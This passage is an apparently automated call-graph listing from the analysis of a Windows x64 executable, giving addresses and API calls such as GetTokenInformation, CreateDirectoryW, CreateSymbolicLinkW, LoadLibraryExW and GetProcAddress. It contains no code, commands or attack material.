17266->17268 17276 7ff710f536db 17266->17276 17270 7ff710f517b0 38 API calls 17267->17270 17271 7ff710f53f74 47 API calls 17268->17271 17284 7ff710f5375d 17268->17284 17269->17283 17270->17283 17271->17283 17272->17268 17274 7ff710f536a0 17272->17274 17272->17283 17275 7ff710f51fd0 38 API calls 17273->17275 17273->17284 17277 7ff710f54430 47 API calls 17274->17277 17274->17284 17275->17283 17276->17265 17278 7ff710f536e0 17276->17278 17277->17283 17280 7ff710f545c8 37 API calls 17278->17280 17278->17284 17279 7ff710f4c5c0 _log10_special 8 API calls 17281 7ff710f539f3 17279->17281 17280->17283 17281->17225 17282 7ff710f5e8c8 47 API calls 17282->17283 17283->17282 17283->17284 17284->17279 17336 7ff710f50d84 17285->17336 17289 7ff710f53f96 17288->17289 17290 7ff710f50bf0 12 API calls 17289->17290 17291 7ff710f53fde 17290->17291 17292 7ff710f5e5e0 46 API calls 17291->17292 17293 7ff710f540b1 17292->17293 17294 7ff710f54830 45 API calls 17293->17294 17296 7ff710f540d3 17293->17296 17294->17296 17295 7ff710f5415c 17295->17253 17296->17295 17297 7ff710f54830 45 API calls 17296->17297 17297->17295 17299 7ff710f54448 17298->17299 17301 7ff710f544b0 17298->17301 17300 7ff710f5e8c8 47 API calls 17299->17300 17299->17301 17300->17301 17301->17253 17304 7ff710f51bf3 17302->17304 17303 7ff710f51c22 17305 7ff710f50bf0 12 API calls 17303->17305 17308 7ff710f51c5f 17303->17308 17304->17303 17306 7ff710f51cdf 17304->17306 17305->17308 17307 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 17306->17307 17307->17308 17308->17253 17310 7ff710f517e3 17309->17310 17311 7ff710f51812 17310->17311 17313 7ff710f518cf 17310->17313 17312 7ff710f50bf0 12 API calls 17311->17312 17315 7ff710f5184f 17311->17315 17312->17315 17314 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 17313->17314 17314->17315 17315->17253 17317 7ff710f52003 17316->17317 17318 7ff710f52032 17317->17318 17320 7ff710f520ef 17317->17320 17319 7ff710f50bf0 12 API calls 17318->17319 17322 7ff710f5206f 17318->17322 17319->17322 17321 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 17320->17321 17321->17322 17322->17253 17325 7ff710f5e8f0 17323->17325 17324 7ff710f5e91e __scrt_get_show_window_mode 17326 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 17324->17326 17331 7ff710f5e8f5 __scrt_get_show_window_mode 17324->17331 17325->17324 17327 7ff710f54830 45 API calls 17325->17327 17328 7ff710f5e935 17325->17328 17325->17331 17326->17331 17327->17328 17328->17324 17328->17331 17333 7ff710f60858 17328->17333 17331->17253 17335 7ff710f6087c WideCharToMultiByte 17333->17335 17337 7ff710f50dc3 17336->17337 17338 7ff710f50db1 17336->17338 17341 7ff710f50dd0 17337->17341 17344 7ff710f50e0d 17337->17344 17339 7ff710f54f78 _set_fmode 11 API calls 17338->17339 17340 7ff710f50db6 17339->17340 17342 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 17340->17342 17343 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 17341->17343 17349 7ff710f50dc1 17342->17349 17343->17349 17345 7ff710f50eb6 17344->17345 17346 7ff710f54f78 _set_fmode 11 API calls 17344->17346 17347 7ff710f54f78 _set_fmode 11 API calls 17345->17347 17345->17349 17350 7ff710f50eab 17346->17350 17348 7ff710f50f60 17347->17348 17351 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 17348->17351 17349->17225 17352 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 17350->17352 17351->17349 17352->17345 17354 7ff710f5ecad 17353->17354 17356 7ff710f5524d 17354->17356 17358 7ff710f5ecb2 17354->17358 17360 7ff710f5ecfc 17354->17360 17355 7ff710f54f78 _set_fmode 11 API calls 17357 7ff710f5ecbc 17355->17357 17356->17203 17356->17204 17359 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 17357->17359 17358->17355 17358->17356 17359->17356 17360->17356 17361 7ff710f54f78 _set_fmode 11 API calls 17360->17361 17361->17357 17363 7ff710f487a1 GetTokenInformation 17362->17363 17366 7ff710f48823 __std_exception_destroy 17362->17366 17364 7ff710f487c2 GetLastError 17363->17364 17365 7ff710f487cd 17363->17365 17364->17365 17364->17366 17365->17366 17369 7ff710f487e9 GetTokenInformation 17365->17369 17367 7ff710f4883c 17366->17367 17368 7ff710f48836 CloseHandle 17366->17368 17367->16344 17368->17367 17369->17366 17370 7ff710f4880c 17369->17370 17370->17366 17371 7ff710f48816 ConvertSidToStringSidW 17370->17371 17371->17366 17373 7ff710f4c8c0 17372->17373 17374 7ff710f42b74 GetCurrentProcessId 17373->17374 17375 7ff710f426b0 48 API calls 17374->17375 17376 7ff710f42bc7 17375->17376 17377 7ff710f54c48 48 API calls 17376->17377 17378 7ff710f42c10 MessageBoxW 17377->17378 17379 7ff710f4c5c0 _log10_special 8 API calls 17378->17379 17380 7ff710f42c40 17379->17380 17380->16354 17382 7ff710f425e5 17381->17382 17383 7ff710f54c48 48 API calls 17382->17383 17384 7ff710f42604 17383->17384 17384->16370 17430 7ff710f58804 17385->17430 17389 7ff710f481cc 17388->17389 17390 7ff710f49400 2 API calls 17389->17390 17391 7ff710f481eb 17390->17391 17392 7ff710f481f3 17391->17392 17393 7ff710f48206 ExpandEnvironmentStringsW 17391->17393 17395 7ff710f42810 49 API calls 17392->17395 17394 7ff710f4822c __std_exception_destroy 17393->17394 17397 7ff710f48243 17394->17397 17398 7ff710f48230 17394->17398 17396 7ff710f481ff __std_exception_destroy 17395->17396 17400 7ff710f4c5c0 _log10_special 8 API calls 17396->17400 17402 7ff710f482af 17397->17402 17404 7ff710f48251 GetDriveTypeW 17397->17404 17399 7ff710f42810 49 API calls 17398->17399 17399->17396 17401 7ff710f4839f 17400->17401 17401->16368 17420 7ff710f582a8 17401->17420 17568 7ff710f57e78 17402->17568 17407 7ff710f48285 17404->17407 17408 7ff710f482a0 17404->17408 17406 7ff710f482c1 17410 7ff710f482c9 17406->17410 17414 7ff710f482dc 17406->17414 17411 7ff710f42810 49 API calls 17407->17411 17561 7ff710f579dc 17408->17561 17412 7ff710f42810 49 API calls 17410->17412 17411->17396 17412->17396 17413 7ff710f4833e CreateDirectoryW 17413->17396 17415 7ff710f4834d GetLastError 17413->17415 17414->17413 17416 7ff710f426b0 48 API calls 17414->17416 17415->17396 17417 7ff710f4835a GetLastError 17415->17417 17418 7ff710f48318 CreateDirectoryW 17416->17418 17418->17414 17421 7ff710f582c8 17420->17421 17422 7ff710f582b5 17420->17422 17669 7ff710f57f2c 17421->17669 17423 7ff710f54f78 _set_fmode 11 API calls 17422->17423 17425 7ff710f582ba 17423->17425 17426 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 17425->17426 17427 7ff710f582c6 17426->17427 17427->16372 17471 7ff710f615c8 17430->17471 17530 7ff710f61340 17471->17530 17551 7ff710f60348 EnterCriticalSection 17530->17551 17562 7ff710f57a2d 17561->17562 17563 7ff710f579fa 17561->17563 17562->17396 17563->17562 17580 7ff710f604e4 17563->17580 17566 7ff710f5a970 _isindst 17 API calls 17567 7ff710f57a5d 17566->17567 17569 7ff710f57e94 17568->17569 17570 7ff710f57f02 17568->17570 17569->17570 17572 7ff710f57e99 17569->17572 17614 7ff710f60830 17570->17614 17573 7ff710f57ece 17572->17573 17574 7ff710f57eb1 17572->17574 17597 7ff710f57cbc GetFullPathNameW 17573->17597 17589 7ff710f57c48 GetFullPathNameW 17574->17589 17579 7ff710f57ec6 __std_exception_destroy 17579->17406 17581 7ff710f604f1 17580->17581 17583 7ff710f604fb 17580->17583 17581->17583 17587 7ff710f60517 17581->17587 17582 7ff710f54f78 _set_fmode 11 API calls 17584 7ff710f60503 17582->17584 17583->17582 17585 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 17584->17585 17586 7ff710f57a29 17585->17586 17586->17562 17586->17566 17587->17586 17588 7ff710f54f78 _set_fmode 11 API calls 17587->17588 17588->17584 17590 7ff710f57c6e GetLastError 17589->17590 17593 7ff710f57c84 17589->17593 17591 7ff710f54eec _fread_nolock 11 API calls 17590->17591 17592 7ff710f57c7b 17591->17592 17594 7ff710f54f78 _set_fmode 11 API calls 17592->17594 17595 7ff710f54f78 _set_fmode 11 API calls 17593->17595 17596 7ff710f57c80 17593->17596 17594->17596 17595->17596 17596->17579 17598 7ff710f57cef GetLastError 17597->17598 17603 7ff710f57d05 __std_exception_destroy 17597->17603 17599 7ff710f54eec _fread_nolock 11 API calls 17598->17599 17600 7ff710f57cfc 17599->17600 17601 7ff710f54f78 _set_fmode 11 API calls 17600->17601 17602 7ff710f57d01 17601->17602 17605 7ff710f57d94 17602->17605 17603->17602 17604 7ff710f57d5f GetFullPathNameW 17603->17604 17604->17598 17604->17602 17606 7ff710f57e08 memcpy_s 17605->17606 17610 7ff710f57dbd __scrt_get_show_window_mode 17605->17610 17606->17579 17607 7ff710f57df1 17608 7ff710f54f78 _set_fmode 11 API calls 17607->17608 17609 7ff710f57df6 17608->17609 17610->17606 17610->17607 17611 7ff710f57e2a 17610->17611 17611->17606 17613 7ff710f54f78 _set_fmode 11 API calls 17611->17613 17613->17609 17617 7ff710f60640 17614->17617 17618 7ff710f6066b 17617->17618 17619 7ff710f60682 17617->17619 17620 7ff710f54f78 _set_fmode 11 API calls 17618->17620 17621 7ff710f606a7 17619->17621 17622 7ff710f60686 17619->17622 17637 7ff710f60670 17620->17637 17655 7ff710f5f628 17621->17655 17643 7ff710f607ac 17622->17643 17625 7ff710f606ac 17627 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 17641 7ff710f6067b __std_exception_destroy 17627->17641 17628 7ff710f6068f 17633 7ff710f4c5c0 _log10_special 8 API calls 17636 7ff710f607a1 17633->17636 17636->17579 17637->17627 17641->17633 17644 7ff710f607f6 17643->17644 17645 7ff710f607c6 17643->17645 17647 7ff710f60801 GetDriveTypeW 17644->17647 17648 7ff710f607e1 17644->17648 17646 7ff710f54f58 _fread_nolock 11 API calls 17645->17646 17649 7ff710f607cb 17646->17649 17647->17648 17651 7ff710f4c5c0 _log10_special 8 API calls 17648->17651 17650 7ff710f54f78 _set_fmode 11 API calls 17649->17650 17652 7ff710f607d6 17650->17652 17653 7ff710f6068b 17651->17653 17653->17625 17653->17628 17656 7ff710f6a540 __scrt_get_show_window_mode 17655->17656 17657 7ff710f5f65e GetCurrentDirectoryW 17656->17657 17658 7ff710f5f69c 17657->17658 17659 7ff710f5f675 17657->17659 17660 7ff710f5ec08 _set_fmode 11 API calls 17658->17660 17662 7ff710f4c5c0 _log10_special 8 API calls 17659->17662 17661 7ff710f5f6ab 17660->17661 17663 7ff710f5f709 17662->17663 17663->17625 17676 7ff710f60348 EnterCriticalSection 17669->17676 17678 7ff710f4455a 17677->17678 17679 7ff710f49400 2 API calls 17678->17679 17680 7ff710f4457f 17679->17680 17681 7ff710f4c5c0 _log10_special 8 API calls 17680->17681 17682 7ff710f445a7 17681->17682 17682->16407 17684 7ff710f47e1e 17683->17684 17685 7ff710f41c80 49 API calls 17684->17685 17688 7ff710f47f42 17684->17688 17691 7ff710f47ea5 17685->17691 17686 7ff710f4c5c0 _log10_special 8 API calls 17687 7ff710f47f73 17686->17687 17687->16407 17688->17686 17689 7ff710f41c80 49 API calls 17689->17691 17690 7ff710f44550 10 API calls 17690->17691 17691->17688 17691->17689 17691->17690 17692 7ff710f47efb 17691->17692 17693 7ff710f49400 2 API calls 17692->17693 17694 7ff710f47f13 CreateDirectoryW 17693->17694 17694->17688 17694->17691 17696 7ff710f41637 17695->17696 17697 7ff710f41613 17695->17697 17699 7ff710f445b0 108 API calls 17696->17699 17816 7ff710f41050 17697->17816 17701 7ff710f4164b 17699->17701 17700 7ff710f41618 17702 7ff710f4162e 17700->17702 17705 7ff710f42710 54 API calls 17700->17705 17703 7ff710f41682 17701->17703 17704 7ff710f41653 17701->17704 17702->16407 17707 7ff710f445b0 108 API calls 17703->17707 17706 7ff710f54f78 _set_fmode 11 API calls 17704->17706 17705->17702 17708 7ff710f41658 17706->17708 17709 7ff710f41696 17707->17709 17712 7ff710f42910 54 API calls 17708->17712 17710 7ff710f416b8 17709->17710 17711 7ff710f4169e 17709->17711 17714 7ff710f50744 73 API calls 17710->17714 17713 7ff710f42710 54 API calls 17711->17713 17715 7ff710f41671 17712->17715 17716 7ff710f416ae 17713->17716 17717 7ff710f416cd 17714->17717 17715->16407 17720 7ff710f500bc 74 API calls 17716->17720 17718 7ff710f416f9 17717->17718 17719 7ff710f416d1 17717->17719 17722 7ff710f41717 17718->17722 17723 7ff710f416ff 17718->17723 17721 7ff710f54f78 _set_fmode 11 API calls 17719->17721 17724 7ff710f41829 17720->17724 17725 7ff710f416d6 17721->17725 17728 7ff710f41739 17722->17728 17735 7ff710f41761 17722->17735 17794 7ff710f41210 17723->17794 17724->16407 17727 7ff710f42910 54 API calls 17725->17727 17734 7ff710f416ef __std_exception_destroy 17727->17734 17730 7ff710f54f78 _set_fmode 11 API calls 17728->17730 17729 7ff710f500bc 74 API calls 17729->17716 17731 7ff710f4173e 17730->17731 17732 7ff710f42910 54 API calls 17731->17732 17732->17734 17733 7ff710f5040c _fread_nolock 53 API calls 17733->17735 17734->17729 17735->17733 17735->17734 17736 7ff710f417da 17735->17736 17740 7ff710f417c5 17735->17740 17847 7ff710f50b4c 17735->17847 17737 7ff710f54f78 _set_fmode 11 API calls 17736->17737 17739 7ff710f417ca 17737->17739 17742 7ff710f42910 54 API calls 17739->17742 17741 7ff710f54f78 _set_fmode 11 API calls 17740->17741 17741->17739 17742->17734 17744 7ff710f47134 17743->17744 17746 7ff710f4717b 17743->17746 17744->17746 17880 7ff710f55094 17744->17880 17746->16407 17748 7ff710f44191 17747->17748 17749 7ff710f444d0 49 API calls 17748->17749 17750 7ff710f441cb 17749->17750 17751 7ff710f444d0 49 API calls 17750->17751 17752 7ff710f441db 17751->17752 17753 7ff710f441fd 17752->17753 17754 7ff710f4422c 17752->17754 17911 7ff710f44100 17753->17911 17756 7ff710f44100 51 API calls 17754->17756 17757 7ff710f4422a 17756->17757 17758 7ff710f44257 17757->17758 17759 7ff710f4428c 17757->17759 17918 7ff710f47ce0 17758->17918 17761 7ff710f44100 51 API calls 17759->17761 17763 7ff710f442b0 17761->17763 17766 7ff710f44100 51 API calls 17763->17766 17771 7ff710f44302 17763->17771 17764 7ff710f44383 17770 7ff710f41950 115 API calls 17764->17770 17765 7ff710f42710 54 API calls 17767 7ff710f44287 17765->17767 17769 7ff710f442d9 17766->17769 17768 7ff710f4c5c0 _log10_special 8 API calls 17767->17768 17772 7ff710f44425 17768->17772 17769->17771 17776 7ff710f44100 51 API calls 17769->17776 17773 7ff710f4438d 17770->17773 17771->17764 17777 7ff710f4437c 17771->17777 17779 7ff710f44307 17771->17779 17782 7ff710f4436b 17771->17782 17772->16407 17774 7ff710f443ee 17773->17774 17775 7ff710f44395 17773->17775 17778 7ff710f42710 54 API calls 17774->17778 17944 7ff710f41840 17775->17944 17776->17771 17777->17775 17777->17779 17778->17779 17783 7ff710f42710 54 API calls 17779->17783 17786 7ff710f42710 54 API calls 17782->17786 17783->17767 17784 7ff710f443ac 17787 7ff710f42710 54 API calls 17784->17787 17785 7ff710f443c2 17788 7ff710f41600 118 API calls 17785->17788 17786->17779 17787->17767 17789 7ff710f443d0 17788->17789 17789->17767 17790 7ff710f42710 54 API calls 17789->17790 17790->17767 17792 7ff710f41c80 49 API calls 17791->17792 17793 7ff710f44464 17792->17793 17793->16407 17795 7ff710f41268 17794->17795 17796 7ff710f41297 17795->17796 17797 7ff710f4126f 17795->17797 17800 7ff710f412b1 17796->17800 17801 7ff710f412d4 17796->17801 17798 7ff710f42710 54 API calls 17797->17798 17799 7ff710f41282 17798->17799 17799->17734 17802 7ff710f54f78 _set_fmode 11 API calls 17800->17802 17805 7ff710f412e6 17801->17805 17814 7ff710f41309 memcpy_s 17801->17814 17803 7ff710f412b6 17802->17803 17804 7ff710f42910 54 API calls 17803->17804 17810 7ff710f412cf __std_exception_destroy 17804->17810 17806 7ff710f54f78 _set_fmode 11 API calls 17805->17806 17808 7ff710f412eb 17806->17808 17807 7ff710f5040c _fread_nolock 53 API calls 17807->17814 17809 7ff710f42910 54 API calls 17808->17809 17809->17810 17810->17734 17811 7ff710f413cf 17812 7ff710f42710 54 API calls 17811->17812 17812->17810 17813 7ff710f50b4c 76 API calls 17813->17814 17814->17807 17814->17810 17814->17811 17814->17813 17815 7ff710f50180 37 API calls 17814->17815 17815->17814 17817 7ff710f445b0 108 API calls 17816->17817 17818 7ff710f4108c 17817->17818 17819 7ff710f410a9 17818->17819 17820 7ff710f41094 17818->17820 17822 7ff710f50744 73 API calls 17819->17822 17821 7ff710f42710 54 API calls 17820->17821 17827 7ff710f410a4 __std_exception_destroy 17821->17827 17823 7ff710f410bf 17822->17823 17824 7ff710f410e6 17823->17824 17825 7ff710f410c3 17823->17825 17829 7ff710f410f7 17824->17829 17830 7ff710f41122 17824->17830 17826 7ff710f54f78 _set_fmode 11 API calls 17825->17826 17828 7ff710f410c8 17826->17828 17827->17700 17831 7ff710f42910 54 API calls 17828->17831 17832 7ff710f54f78 _set_fmode 11 API calls 17829->17832 17833 7ff710f41129 17830->17833 17841 7ff710f4113c 17830->17841 17846 7ff710f410e1 __std_exception_destroy 17831->17846 17834 7ff710f41100 17832->17834 17835 7ff710f41210 92 API calls 17833->17835 17836 7ff710f42910 54 API calls 17834->17836 17835->17846 17836->17846 17837 7ff710f500bc 74 API calls 17839 7ff710f411b4 17837->17839 17838 7ff710f5040c _fread_nolock 53 API calls 17838->17841 17839->17827 17851 7ff710f446e0 17839->17851 17840 7ff710f411ed 17843 7ff710f54f78 _set_fmode 11 API calls 17840->17843 17841->17838 17841->17840 17841->17846 17844 7ff710f411f2 17843->17844 17845 7ff710f42910 54 API calls 17844->17845 17845->17846 17846->17837 17848 7ff710f50b7c 17847->17848 17865 7ff710f5089c 17848->17865 17850 7ff710f50b9a 17850->17735 17852 7ff710f446f0 17851->17852 17853 7ff710f49400 2 API calls 17852->17853 17854 7ff710f4471b 17853->17854 17855 7ff710f4478e 17854->17855 17856 7ff710f49400 2 API calls 17854->17856 17857 7ff710f4c5c0 _log10_special 8 API calls 17855->17857 17858 7ff710f44736 17856->17858 17859 7ff710f447a9 17857->17859 17858->17855 17860 7ff710f4473b CreateSymbolicLinkW 17858->17860 17859->17827 17860->17855 17861 7ff710f44765 17860->17861 17861->17855 17862 7ff710f4476e GetLastError 17861->17862 17862->17855 17863 7ff710f44779 17862->17863 17866 7ff710f508bc 17865->17866 17867 7ff710f508e9 17865->17867 17866->17867 17868 7ff710f508c6 17866->17868 17869 7ff710f508f1 17866->17869 17867->17850 17870 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 17868->17870 17872 7ff710f507dc 17869->17872 17870->17867 17879 7ff710f554dc EnterCriticalSection 17872->17879 17881 7ff710f550ce 17880->17881 17882 7ff710f550a1 17880->17882 17884 7ff710f550f1 17881->17884 17885 7ff710f5510d 17881->17885 17883 7ff710f54f78 _set_fmode 11 API calls 17882->17883 17893 7ff710f55058 17882->17893 17886 7ff710f550ab 17883->17886 17887 7ff710f54f78 _set_fmode 11 API calls 17884->17887 17895 7ff710f54fbc 17885->17895 17889 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 17886->17889 17890 7ff710f550f6 17887->17890 17892 7ff710f550b6 17889->17892 17894 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 17890->17894 17891 7ff710f55101 17891->17744 17892->17744 17893->17744 17894->17891 17896 7ff710f54fe0 17895->17896 17902 7ff710f54fdb 17895->17902 17897 7ff710f5b1c0 _CreateFrameInfo 45 API calls 17896->17897 17896->17902 17898 7ff710f54ffb 17897->17898 17903 7ff710f5d9f4 17898->17903 17902->17891 17904 7ff710f5da09 17903->17904 17905 7ff710f5501e 17903->17905 17904->17905 17906 7ff710f63374 45 API calls 17904->17906 17907 7ff710f5da60 17905->17907 17906->17905 17908 7ff710f5da88 17907->17908 17909 7ff710f5da75 17907->17909 17908->17902 17909->17908 17910 7ff710f626c0 45 API calls 17909->17910 17910->17908 17912 7ff710f44126 17911->17912 17913 7ff710f549f4 49 API calls 17912->17913 17914 7ff710f4414c 17913->17914 17915 7ff710f4415d 17914->17915 17916 7ff710f44550 10 API calls 17914->17916 17915->17757 17917 7ff710f4416f 17916->17917 17917->17757 17919 7ff710f47cf5 17918->17919 17920 7ff710f445b0 108 API calls 17919->17920 17921 7ff710f47d1b 17920->17921 17922 7ff710f47d42 17921->17922 17923 7ff710f445b0 108 API calls 17921->17923 17925 7ff710f4c5c0 _log10_special 8 API calls 17922->17925 17924 7ff710f47d32 17923->17924 17926 7ff710f47d3d 17924->17926 17927 7ff710f47d4c 17924->17927 17928 7ff710f44267 17925->17928 17929 7ff710f500bc 74 API calls 17926->17929 17948 7ff710f50154 17927->17948 17928->17765 17928->17767 17929->17922 17931 7ff710f47daf 17932 7ff710f500bc 74 API calls 17931->17932 17933 7ff710f47dd7 17932->17933 17934 7ff710f5040c _fread_nolock 53 API calls 17942 7ff710f47d51 17934->17942 17936 7ff710f47db6 17938 7ff710f50180 37 API calls 17936->17938 17937 7ff710f50b4c 76 API calls 17937->17942 17939 7ff710f47db1 17938->17939 17939->17931 17954 7ff710f57388 17939->17954 17940 7ff710f50180 37 API calls 17940->17942 17942->17931 17942->17934 17942->17936 17942->17937 17942->17939 17942->17940 17943 7ff710f50154 37 API calls 17942->17943 17943->17942 17946 7ff710f41865 17944->17946 17947 7ff710f418d5 17944->17947 17945 7ff710f55094 45 API calls 17945->17946 17946->17945 17946->17947 17947->17784 17947->17785 17949 7ff710f5015d 17948->17949 17953 7ff710f5016d 17948->17953 17950 7ff710f54f78 _set_fmode 11 API calls 17949->17950 17951 7ff710f50162 17950->17951 17952 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 17951->17952 17952->17953 17953->17942 17955 7ff710f57390 17954->17955 17956 7ff710f573ac 17955->17956 17957 7ff710f573cd 17955->17957 17975 7ff710f55f38 17974->17975 17976 7ff710f55f5e 17975->17976 17978 7ff710f55f91 17975->17978 17977 7ff710f54f78 _set_fmode 11 API calls 17976->17977 17979 7ff710f55f63 17977->17979 17980 7ff710f55f97 17978->17980 17981 7ff710f55fa4 17978->17981 17982 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 17979->17982 17983 7ff710f54f78 _set_fmode 11 API calls 17980->17983 17993 7ff710f5ac98 17981->17993 17992 7ff710f44606 17982->17992 17983->17992 17992->16432 18006 7ff710f60348 EnterCriticalSection 17993->18006 18367 7ff710f57968 18366->18367 18370 7ff710f57444 18367->18370 18369 7ff710f57981 18369->16442 18371 7ff710f5748e 18370->18371 18372 7ff710f5745f 18370->18372 18380 7ff710f554dc EnterCriticalSection 18371->18380 18373 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 18372->18373 18379 7ff710f5747f 18373->18379 18379->18369 18382 7ff710f4feb3 18381->18382 18383 7ff710f4fee1 18381->18383 18384 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 18382->18384 18386 7ff710f4fed3 18383->18386 18391 7ff710f554dc EnterCriticalSection 18383->18391 18384->18386 18386->16446 18393 7ff710f4cb62 RtlLookupFunctionEntry 18392->18393 18394 7ff710f4cb78 RtlVirtualUnwind 18393->18394 18395 7ff710f4c97b 18393->18395 18394->18393 18394->18395 18396 7ff710f4c910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18395->18396 18398 7ff710f445b0 108 API calls 18397->18398 18399 7ff710f41493 18398->18399 18400 7ff710f414bc 18399->18400 18401 7ff710f4149b 18399->18401 18403 7ff710f50744 73 API calls 18400->18403 18402 7ff710f42710 54 API calls 18401->18402 18404 7ff710f414ab 18402->18404 18405 7ff710f414d1 18403->18405 18404->16488 18406 7ff710f414f8 18405->18406 18407 7ff710f414d5 18405->18407 18410 7ff710f41508 18406->18410 18411 7ff710f41532 18406->18411 18408 7ff710f54f78 _set_fmode 11 API calls 18407->18408 18409 7ff710f414da 18408->18409 18412 7ff710f42910 54 API calls 18409->18412 18413 7ff710f54f78 _set_fmode 11 API calls 18410->18413 18414 7ff710f41538 18411->18414 18422 7ff710f4154b 18411->18422 18419 7ff710f414f3 __std_exception_destroy 18412->18419 18415 7ff710f41510 18413->18415 18416 7ff710f41210 92 API calls 18414->18416 18417 7ff710f42910 54 API calls 18415->18417 18416->18419 18417->18419 18418 7ff710f500bc 74 API calls 18420 7ff710f415c4 18418->18420 18419->18418 18420->16488 18421 7ff710f5040c _fread_nolock 53 API calls 18421->18422 18422->18419 18422->18421 18423 7ff710f415d6 18422->18423 18424 7ff710f54f78 _set_fmode 11 API calls 18423->18424 18425 7ff710f415db 18424->18425 18426 7ff710f42910 54 API calls 18425->18426 18426->18419 18428 7ff710f49400 2 API calls 18427->18428 18429 7ff710f49084 LoadLibraryExW 18428->18429 18430 7ff710f490a3 __std_exception_destroy 18429->18430 18430->16522 18504 7ff710f46365 18503->18504 18505 7ff710f41c80 49 API calls 18504->18505 18506 7ff710f463a1 18505->18506 18507 7ff710f463aa 18506->18507 18508 7ff710f463cd 18506->18508 18509 7ff710f42710 54 API calls 18507->18509 18510 7ff710f44620 49 API calls 18508->18510 18526 7ff710f463c3 18509->18526 18511 7ff710f463e5 18510->18511 18512 7ff710f46403 18511->18512 18514 7ff710f42710 54 API calls 18511->18514 18515 7ff710f44550 10 API calls 18512->18515 18513 7ff710f4c5c0 _log10_special 8 API calls 18516 7ff710f4336e 18513->18516 18514->18512 18517 7ff710f4640d 18515->18517 18516->16562 18534 7ff710f464f0 18516->18534 18518 7ff710f4641b 18517->18518 18520 7ff710f49070 3 API calls 18517->18520 18519 7ff710f44620 49 API calls 18518->18519 18521 7ff710f46434 18519->18521 18520->18518 18522 7ff710f46459 18521->18522 18523 7ff710f46439 18521->18523 18525 7ff710f49070 3 API calls 18522->18525 18524 7ff710f42710 54 API calls 18523->18524 18524->18526 18527 7ff710f46466 18525->18527 18526->18513 18528 7ff710f46472 18527->18528 18529 7ff710f464b1 18527->18529 18530 7ff710f49400 2 API calls 18528->18530 18593 7ff710f45820 GetProcAddress 18529->18593 18532 7ff710f4648a GetLastError 18530->18532 18533 7ff710f42c50 51 API calls 18532->18533 18533->18526 18683 7ff710f453f0 18534->18683 18536 7ff710f46516 18537 7ff710f4651e 18536->18537 18538 7ff710f4652f 18536->18538 18540 7ff710f42710 54 API calls 18537->18540 18690 7ff710f44c80 18538->18690 18545 7ff710f4652a 18540->18545 18542 7ff710f4654c 18546 7ff710f4655c 18542->18546 18548 7ff710f4656d 18542->18548 18543 7ff710f4653b 18544 7ff710f42710 54 API calls 18543->18544 18544->18545 18545->16558 18547 7ff710f42710 54 API calls 18546->18547 18547->18545 18549 7ff710f4659d 18548->18549 18550 7ff710f4658c 18548->18550 18552 7ff710f465bd 18549->18552 18553 7ff710f465ac 18549->18553 18551 7ff710f42710 54 API calls 18550->18551 18551->18545 18572 7ff710f46060 18571->18572 18572->18572 18573 7ff710f46089 18572->18573 18579 7ff710f460a0 __std_exception_destroy 18572->18579 18574 7ff710f42710 54 API calls 18573->18574 18575 7ff710f46095 18574->18575 18575->16560 18576 7ff710f461ab 18576->16560 18577 7ff710f41470 116 API calls 18577->18579 18578 7ff710f42710 54 API calls 18578->18579 18579->18576 18579->18577 18579->18578 18594 7ff710f45842 GetLastError 18593->18594 18595 7ff710f4586f GetProcAddress 18593->18595 18598 7ff710f4584f 18594->18598 18596 7ff710f4589a GetProcAddress 18595->18596 18597 7ff710f4588b GetLastError 18595->18597 18599 7ff710f458b6 GetLastError 18596->18599 18600 7ff710f458c5 GetProcAddress 18596->18600 18597->18598 18601 7ff710f42c50 51 API calls 18598->18601 18599->18598 18602 7ff710f458e1 GetLastError 18600->18602 18603 7ff710f458f3 GetProcAddress 18600->18603 18604 7ff710f45864 18601->18604 18602->18598 18605 7ff710f45921 GetProcAddress 18603->18605 18606 7ff710f4590f GetLastError 18603->18606 18604->18526 18606->18598 18685 7ff710f4541c 18683->18685 18684 7ff710f45424 18684->18536 18685->18684 18688 7ff710f455c4 18685->18688 18714 7ff710f56b14 18685->18714 18686 7ff710f45787 __std_exception_destroy 18686->18536 18687 7ff710f447c0 47 API calls 18687->18688 18688->18686 18688->18687 18691 7ff710f44cb0 18690->18691 18692 7ff710f4c5c0 _log10_special 8 API calls 18691->18692 18693 7ff710f44d1a 18692->18693 18693->18542 18693->18543 18715 7ff710f56b44 18714->18715 18718 7ff710f56010 18715->18718 18717 7ff710f56b74 18717->18685 18719 7ff710f56053 18718->18719 18720 7ff710f56041 18718->18720 18721 7ff710f5609d 18719->18721 18723 7ff710f56060 18719->18723 18722 7ff710f54f78 _set_fmode 11 API calls 18720->18722 18724 7ff710f560b8 18721->18724 18727 7ff710f54830 45 API calls 18721->18727 18725 7ff710f56046 18722->18725 18726 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 18723->18726 18730 7ff710f560da 18724->18730 18739 7ff710f56a9c 18724->18739 18729 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 18725->18729 18737 7ff710f56051 18726->18737 18727->18724 18729->18737 18731 7ff710f5617b 18730->18731 18733 7ff710f54f78 _set_fmode 11 API calls 18730->18733 18732 7ff710f54f78 _set_fmode 11 API calls 18731->18732 18731->18737 18734 7ff710f56226 18732->18734 18735 7ff710f56170 18733->18735 18736 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 18734->18736 18738 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 18735->18738 18736->18737 18737->18717 18738->18731 18740 7ff710f56ad6 18739->18740 18741 7ff710f56abf 18739->18741 18743 